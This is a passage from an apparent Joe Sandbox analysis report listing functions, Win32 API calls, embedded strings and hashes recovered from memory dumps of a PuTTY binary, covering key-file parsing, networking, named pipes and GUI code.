+, xrefs: 00C62021
gfff, xrefs: 00C6253F
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62B61

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText$ChooseMessageSend_strlen$ButtonCapsCaptureCheckedClipboardColorDeviceDrawEdgeExtentFontFormatModePoint32RegisterRelease_strncpy
String ID: !c->data$+$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$All Files (*.*)$commctrl_DragListMsg$gfff
API String ID: 1971161187-3730221381
Opcode ID: 1a5c4ed64c14af7ee8073ca0fe3d462332bb7959b3fe9054c48094c81e68cfaf
Instruction ID: aa6787bf1716507ee3bb797cff72fe096f788b910c57d580d0bf0f9be5c3b3f2
Opcode Fuzzy Hash: 1a5c4ed64c14af7ee8073ca0fe3d462332bb7959b3fe9054c48094c81e68cfaf
Instruction Fuzzy Hash: AC62D170608B449FDB348F25C8D5BBAB7E6EF88300F58452DE99A87391D7B09D80DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3CF0 Relevance: 47.9, APIs: 6, Strings: 21, Instructions: 668COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CA3DDA
___from_strstr_to_strchr.LIBCMT ref: 00CA3DF9
_strlen.LIBCMT ref: 00CA3E24
_strlen.LIBCMT ref: 00CA406B
_strlen.LIBCMT ref: 00CA41A7

Strings

invalid length for base64 data in OpenSSH public key file, xrefs: 00CA3E64
Comment, xrefs: 00CA3F2F
PuTTY-User-Key-File-3, xrefs: 00CA40F1
Public-Lines, xrefs: 00CA44CD
ent, xrefs: 00CA43F5
Subject, xrefs: 00CA3F41
---- BEGIN SSH2 PUBLIC KEY ----, xrefs: 00CA3D54
Comm, xrefs: 00CA43EC
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c, xrefs: 00CA4044
pubbloblen + 3 <= pubblobsize, xrefs: 00CA4049
%.*s, xrefs: 00CA4460
PuTTY-User-Key-File-1, xrefs: 00CA411D
not a public key or a PuTTY SSH-2 private key, xrefs: 00CA3E77, 00CA414A
key algorithms do not match in OpenSSH public key file, xrefs: 00CA40A0
PuTTY key format too new, xrefs: 00CA4145
---- END SSH2 PUBLIC KEY ----, xrefs: 00CA4304
PuTTY-User-Key-File-, xrefs: 00CA4135
file format error, xrefs: 00CA4197
Encryption, xrefs: 00CA43A3
PuTTY-User-Key-File-2, xrefs: 00CA4109
no key blob in OpenSSH public key file, xrefs: 00CA3E83

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen$___from_strstr_to_strchr
String ID: %.*s$---- BEGIN SSH2 PUBLIC KEY ----$---- END SSH2 PUBLIC KEY ----$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c$Comm$Comment$Encryption$PuTTY key format too new$PuTTY-User-Key-File-$PuTTY-User-Key-File-1$PuTTY-User-Key-File-2$PuTTY-User-Key-File-3$Public-Lines$Subject$ent$file format error$invalid length for base64 data in OpenSSH public key file$key algorithms do not match in OpenSSH public key file$no key blob in OpenSSH public key file$not a public key or a PuTTY SSH-2 private key$pubbloblen + 3 <= pubblobsize
API String ID: 3974054854-2230089148
Opcode ID: e4f3d749f400a527a3b4fc38c870b6fbdca95aa1544fe217e9d97df7409a1dcf
Instruction ID: 35c5b499c4acc6ea60c38afdb41ccd2b7888c4b36a6b429d26598c2e96a9afb9
Opcode Fuzzy Hash: e4f3d749f400a527a3b4fc38c870b6fbdca95aa1544fe217e9d97df7409a1dcf
Instruction Fuzzy Hash: B52208B1A043465FD724AA60AC42B3B77A5AB9630CF090838FD5997342F7B5EE04D793

Uniqueness

Uniqueness Score: -1.00%

Function 00C48920 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1097COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00C48D81
SetTextColor.GDI32(?), ref: 00C48D92
SetBkColor.GDI32(?), ref: 00C48D9F
SetBkMode.GDI32(-00000002), ref: 00C48DB5

Strings

$, xrefs: 00C496E8

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Color$ModeObjectSelectText
String ID: $
API String ID: 3594386986-3993045852
Opcode ID: 08ba8fce6640d79ad558722a9e0253572c0c28bf9caf77f8e2c19b488ded7d57
Instruction ID: 191c0cf95bbbb96dc62ac5c2ce09ad29f2e9de20bd8a1ab173ebeeeacfa3cb53
Opcode Fuzzy Hash: 08ba8fce6640d79ad558722a9e0253572c0c28bf9caf77f8e2c19b488ded7d57
Instruction Fuzzy Hash: 41920F75A083119FDB24CF14DC81B6EBBE2FB85300F09852DF999973A1DB349984DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C75FB0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 331networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00C75FE0
socket.WS2_32(00000001,00000001,00000000), ref: 00C76074
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00C7608D
setsockopt.WS2_32(00000000,0000FFFF,00000100,?,00000004), ref: 00C760AF
setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00C760CB
htons.WS2_32(00000000), ref: 00C761B9
bind.WS2_32(?,?,00000010), ref: 00C761CB
WSAGetLastError.WS2_32 ref: 00C761D6
htons.WS2_32(?), ref: 00C76251
htonl.WS2_32(?), ref: 00C762F3
htons.WS2_32(?), ref: 00C76325
setsockopt.WS2_32(00000000,0000FFFF,00000008,?,00000004), ref: 00C760EA

Part of subcall function 00C65810: WSAAsyncSelect.WS2_32(?,00000000,00008005,0000003F), ref: 00C65854

connect.WS2_32(?,?,00000010), ref: 00C763BB
WSAGetLastError.WS2_32 ref: 00C7641D

Strings

sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00C762D0
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c, xrefs: 00C762CB

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: htonssetsockopt$ErrorLast$AsyncHandleInformationSelectbindclosesocketconnecthtonlsocket
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
API String ID: 115623123-769765643
Opcode ID: f7c639293603d3640106ac1b149ebb30dec82a820b0075d74f34b3830b16d34a
Instruction ID: ad1d092eacde56b226f979dbc677d0f0004870976b39435c114599972b69182f
Opcode Fuzzy Hash: f7c639293603d3640106ac1b149ebb30dec82a820b0075d74f34b3830b16d34a
Instruction Fuzzy Hash: D4D1CC70504701AFD320DF24D989B6ABBE4FF88314F508818F95D973A1E775E954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C764A0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 287networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 00C76546
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00C7655F
_strncpy.LIBCMT ref: 00C76580
setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000001,00000004), ref: 00C765AD
getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00C76723
htons.WS2_32(?), ref: 00C76778
bind.WS2_32(00000000,00000001,00000010), ref: 00C767B5
listen.WS2_32(00000000,7FFFFFFF), ref: 00C767C6
closesocket.WS2_32(00000000), ref: 00C767E3
WSAGetLastError.WS2_32 ref: 00C7680A

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c, xrefs: 00C7689F
false && "bad address family in sk_newlistener_internal", xrefs: 00C768A4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorHandleInformationLast_strncpybindclosesocketgetaddrinfohtonslistensetsockoptsocket
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
API String ID: 1644184481-2145753083
Opcode ID: 7db4be70fc7d1c0e12f353585411f8c43a8787efcda98b04f20c8a85c720d909
Instruction ID: 386b89da1c194859897064fd12ad3e750f884245cca8e94d1df750f7d3c24f50
Opcode Fuzzy Hash: 7db4be70fc7d1c0e12f353585411f8c43a8787efcda98b04f20c8a85c720d909
Instruction Fuzzy Hash: F8B17AB45087409FE3249F20D889B6BBBF4EF85318F14891CF49E8B3A1D7759948DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C65230 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 287COMMON

Download Yara Rule

APIs

Part of subcall function 00C896E0: GetLocalTime.KERNEL32(?,?,?,?,00C64BB4,?), ref: 00C896F6

_strftime.LIBCMT ref: 00C65289

Part of subcall function 00C65600: _strlen.LIBCMT ref: 00C6562D

Strings

(%s), xrefs: 00C6534B
XX, xrefs: 00C654C9
%Y-%m-%d %H:%M:%S, xrefs: 00C65281
(%zu byte%s omitted), xrefs: 00C6545B, 00C655BB
%02x, xrefs: 00C654F3
%s packet , xrefs: 00C652F2
type %d / 0x%02x (%s), xrefs: 00C65317
on behalf of downstream #%u, xrefs: 00C65338
%s raw data at %s, xrefs: 00C652A2
%08zx%*s, xrefs: 00C65487
#0x%lx, , xrefs: 00C65306
Incoming, xrefs: 00C65293, 00C652E4
Outgoing, xrefs: 00C65298, 00C652A1, 00C652E9, 00C652F1

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: LocalTime_strftime_strlen
String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
API String ID: 4241967358-2889948183
Opcode ID: 06c27ddc03785c0cb8f793dac6f7b2e6d7532b7cdb56aee73f24cc52dafcb2f3
Instruction ID: 340d29011a08de74d0f77b4370fccf3dd397a39c7c08c9342b22798b5da5cb5d
Opcode Fuzzy Hash: 06c27ddc03785c0cb8f793dac6f7b2e6d7532b7cdb56aee73f24cc52dafcb2f3
Instruction Fuzzy Hash: 90A114B5608B449FC734AE14D8D5ABFB3E5AFC5704FA4482CF88A87312EA70D944C792

Uniqueness

Uniqueness Score: -1.00%

Function 00C5E280 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00C5E2C7
SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00D40020), ref: 00C5E2E8
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00C5E314
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00C5E36B
GetParent.USER32(?), ref: 00C5E392
SetActiveWindow.USER32(00000000), ref: 00C5E399
DestroyWindow.USER32(?), ref: 00C5E3A0
SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 00C5E3DF
SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 00C5E40F
_strlen.LIBCMT ref: 00C5E456
MessageBeep.USER32(00000000), ref: 00C5E485
_strlen.LIBCMT ref: 00C5E4EE
SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 00C5E5C1

Strings

%s Event Log, xrefs: 00C5E2B6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
String ID: %s Event Log
API String ID: 2560716093-583241876
Opcode ID: 9420574127c632e3732e75badefe74baa35741725a01ca3d480501afa5c4d901
Instruction ID: f2a37b3d7be286281cb85e8bdd094f618c3e8aeaf0f6a68c0b48f8c010322c2e
Opcode Fuzzy Hash: 9420574127c632e3732e75badefe74baa35741725a01ca3d480501afa5c4d901
Instruction Fuzzy Hash: 13910779604300AFEB289F60EC81B7A33E4EB45705F440529FD45D73E1E770AA88DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00C49D80 Relevance: 21.5, APIs: 14, Instructions: 519windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 00C49D9F
GetClientRect.USER32(?), ref: 00C49DB0
DeleteObject.GDI32(00000000), ref: 00C49E41
DestroyIcon.USER32(FFFFFFFF), ref: 00C49E50
GetClientRect.USER32(?), ref: 00C49E8E
InvalidateRect.USER32(00000000,00000001), ref: 00C49EFE
IsZoomed.USER32 ref: 00C49F0A
DeleteObject.GDI32(?), ref: 00C49FC5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Rect$ClientDeleteObject$DestroyIconInvalidateWindowZoomed
String ID:
API String ID: 1563564061-0
Opcode ID: 8c1af64a4725391954bb26a71f0469193b534d474ff3be74202245545d3cb967
Instruction ID: 2d539e47500deb5e106b655e2fd0473e2b8b39b4a318b95f143989465fb55823
Opcode Fuzzy Hash: 8c1af64a4725391954bb26a71f0469193b534d474ff3be74202245545d3cb967
Instruction Fuzzy Hash: 94227B7D644301CFC714DF28EC84A6A7BE1FB89354F184628EA55DB3A2D730AC91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C6D0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7C870: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432EC), ref: 00C7C8ED
Part of subcall function 00C7C870: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C91C
Part of subcall function 00C7C870: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C926

LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00C7C79D
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00C7C7AD
SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00C7C7C2
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00C7C7D5
GetLastError.KERNEL32(?,00000000,?), ref: 00C7C80D
LocalFree.KERNEL32(00000000), ref: 00C7C830
LocalFree.KERNEL32(00000000), ref: 00C7C844

Strings

unable to initialise security descriptor: %s, xrefs: 00C7C7FA
unable to allocate security descriptor: %s, xrefs: 00C7C7F3, 00C7C81D
unable to set DACL in security descriptor: %s, xrefs: 00C7C808
unable to set owner in security descriptor: %s, xrefs: 00C7C801
unable to construct ACL: %s, xrefs: 00C7C78B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
API String ID: 436594416-3066058096
Opcode ID: bd079fe150a083301ea434a9ab45b448df437d0017000e3751e2d282104af59b
Instruction ID: 27f8a339cb3fff9c4b4005743bc029a1ddcd2dbfca7b621d32a20b0f5d400878
Opcode Fuzzy Hash: bd079fe150a083301ea434a9ab45b448df437d0017000e3751e2d282104af59b
Instruction Fuzzy Hash: 55416CB0604301AFEB108F65EC8571A7BE5BB45704F14842DF959DB3A0D7B6D900CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00C41E56 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 360windowtimeCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D
GetKeyboardState.USER32(?), ref: 00C42758
GetKeyboardState.USER32(?), ref: 00C42782
GetMessageTime.USER32 ref: 00C42811
ReleaseCapture.USER32 ref: 00C42A03
SetCapture.USER32(?), ref: 00C42D59

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CaptureCursorKeyboardMessageState$LongReleaseSendShowTimeWindowZoomed
String ID: (
API String ID: 3533334589-3887548279
Opcode ID: 0f86f456d3b8978f45733ac5d261d93bc9e0eaa198bae23ab0d3ce5fc24d83ac
Instruction ID: 8ab6107e81f3133d71443fbace71f1dff8191b9375090a9ba070052e9ef1a023
Opcode Fuzzy Hash: 0f86f456d3b8978f45733ac5d261d93bc9e0eaa198bae23ab0d3ce5fc24d83ac
Instruction Fuzzy Hash: 4DC1257AA18350DBEB249F25EC8677E3BE1FB85300F58442CF586C33A1D6719980DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B280 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00C4B2AC

Strings

hhctrl.ocx, xrefs: 00C4B293
Software\SimonTatham\PuTTY\CHMPath, xrefs: 00C4B371
HtmlHelpA, xrefs: 00C4B2A6
Software\SimonTatham\PuTTY64\CHMPath, xrefs: 00C4B359

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc
String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
API String ID: 190572456-509675872
Opcode ID: 917b52b0616aae04b1a0d62ced7cc5c5e3a490f065c305731027ac1a3590d1ff
Instruction ID: 596f4fa05032c41d24e31a0b568719ffeed0c543eb74da6a6225037254b4aec2
Opcode Fuzzy Hash: 917b52b0616aae04b1a0d62ced7cc5c5e3a490f065c305731027ac1a3590d1ff
Instruction Fuzzy Hash: 9221AF7C644351ABE7215F36BD497553A997B27345F080034FC09E23A1EBE4CD858B75

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF5F0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 121pipeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7EA00: _strlen.LIBCMT ref: 00C7EA0B

___from_strstr_to_strchr.LIBCMT ref: 00CCF686
CreateNamedPipeA.KERNEL32(?,40080003,00000008,000000FF,00001000,00001000,00000000), ref: 00CCF6F9
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CCF732
GetLastError.KERNEL32 ref: 00CCF758

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

Strings

unable to create named pipe '%s': %s, xrefs: 00CCF76C
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/named-pipe-server.c, xrefs: 00CCF664, 00CCF697
\\.\pipe\, xrefs: 00CCF64D
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00CCF669
strchr(pipename + 9, '\\') == NULL, xrefs: 00CCF69C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Create_strlen$ErrorEventFormatLastMessageNamedPipe___from_strstr_to_strchr
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
API String ID: 2501268550-3976869876
Opcode ID: 6e3af25bd067ba37868e5adb2671b484a4f121e4fa783dc56b2d471680c9857e
Instruction ID: 2989e263b76910df1c1e163fa02e994d7dffb9ef8a7ab345974bf9a363facb40
Opcode Fuzzy Hash: 6e3af25bd067ba37868e5adb2671b484a4f121e4fa783dc56b2d471680c9857e
Instruction Fuzzy Hash: 7B41C7B06407006FE320AF25DC47F177BE9AF44758F05892CF5499B3D2E7B1A5088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C46150 Relevance: 15.1, APIs: 10, Instructions: 61clipboardwindowmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00002002,?), ref: 00C4616C
GlobalLock.KERNEL32(00000000), ref: 00C4617D
GlobalUnlock.KERNEL32(00000000), ref: 00C461A0
SendMessageA.USER32(00008002,00000001,00000000), ref: 00C461B9
OpenClipboard.USER32 ref: 00C461C5
EmptyClipboard.USER32 ref: 00C461CF
SetClipboardData.USER32(00000001,00000000), ref: 00C461D8
CloseClipboard.USER32 ref: 00C461DE
SendMessageA.USER32(00008002,00000000,00000000), ref: 00C461F7
GlobalFree.KERNEL32(00000000), ref: 00C46203

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

